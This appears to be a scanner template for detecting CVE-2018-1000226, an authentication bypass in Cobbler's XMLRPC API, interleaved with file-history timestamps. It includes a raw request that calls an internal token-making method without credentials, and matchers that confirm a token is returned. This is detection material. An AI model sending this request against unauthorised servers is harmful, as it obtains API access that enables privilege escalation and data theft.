2022-02-14 17:20:32 +00:00
id : CVE-2018-1000226
info :
2022-05-13 20:26:43 +00:00
name : Cobbler - Authentication Bypass
2022-02-14 17:20:32 +00:00
author : c-sh0
severity : critical
2022-05-13 20:26:43 +00:00
description : Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931.
2023-09-06 12:57:14 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler.
2022-02-14 17:20:32 +00:00
reference :
- https://github.com/cobbler/cobbler/issues/1916
- https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000226
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2022-02-14 17:20:32 +00:00
cve-id : CVE-2018-1000226
cwe-id : CWE-732
2024-01-14 13:49:27 +00:00
epss-score : 0.01309
epss-percentile : 0.84446
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : cobblerd
product : cobbler
2024-01-14 09:21:50 +00:00
tags : cve2018,cve,cobbler,auth-bypass,cobblerd
2022-02-14 17:20:32 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-14 17:20:32 +00:00
- raw :
- |
POST {{BaseURL}}/cobbler_api HTTP/1.1
Host : {{Hostname}}
Content-Type : text/xml
<?xml version='1.0'?>
<methodCall>
<methodName>_CobblerXMLRPCInterface__make_token</methodName>
<params>
<param>
<value>
<string>cobbler</string>
</value>
</param>
</params>
</methodCall>
matchers-condition : and
matchers :
2023-07-11 19:49:27 +00:00
- type : dsl
dsl :
- "!contains(tolower(body), '<name>faultCode</name>')"
2022-02-14 17:20:32 +00:00
- type : word
part : header
words :
- "Content-Type: text/xml"
- type : word
part : body
words :
- "<methodResponse>"
- type : regex
part : body
regex :
- "(.*[a-zA-Z0-9].+==)</string></value>"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2024-01-26 08:31:11 +00:00
# digest: 4b0a00483046022100c36b8c1ba02776d4f1571cdca202e62d7b82dd127cebe19023dff995365305f0022100ee34f5da8f6807dd04df42e198bc03ac6891aad439f251980103877268617bcb:922c64590222798bb761d5b6d8e72950